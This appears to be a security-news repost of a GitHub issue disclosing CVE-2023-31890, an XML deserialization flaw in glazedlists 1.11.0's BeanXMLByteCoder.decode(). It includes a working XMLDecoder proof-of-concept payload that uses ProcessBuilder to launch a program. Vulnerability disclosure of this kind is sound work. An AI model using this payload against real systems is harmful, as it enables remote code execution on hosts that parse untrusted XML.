Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-31890: XML Deserialization vulnerability in BeanXMLByteCoder · Issue #709 · glazedlists/glazedlists

An XML Deserialization vulnerability in glazedlists v1.11.0 allows an attacker to execute arbitrary code via the BeanXMLByteCoder.decode() parameter.

CVE
Open in Source
#vulnerability#windows#java#dell

vulnerability location: ca.odell.glazedlists.impl.io.BeanXMLByteCoder

BeanXMLByteCoder class provides decode() method to decode the Object from a InputStream.

When the decode() method is called, the program will call XMLDecoder.readObject() to parse the XML string without any check, which causing a XML Deserialization vulnerability.

ca.odell.glazedlists.impl.io.BeanXMLByteCoder#decode

attack payload:

<java> <object class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="1"> <void index="0"><string>calc</string></void> </array> <void method="start"></void> </object> </java>

use a little program to test.

os: windows 10
jdk: 1.8.0_111
glazedlists: 1.11.0

Related news

GHSA-p6m6-9j36-vfjx: glazedlists XML Deserialization vulnerability

An XML Deserialization vulnerability in glazedlists v1.11.0 allows an attacker to execute arbitrary code via the BeanXMLByteCoder.decode() parameter.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE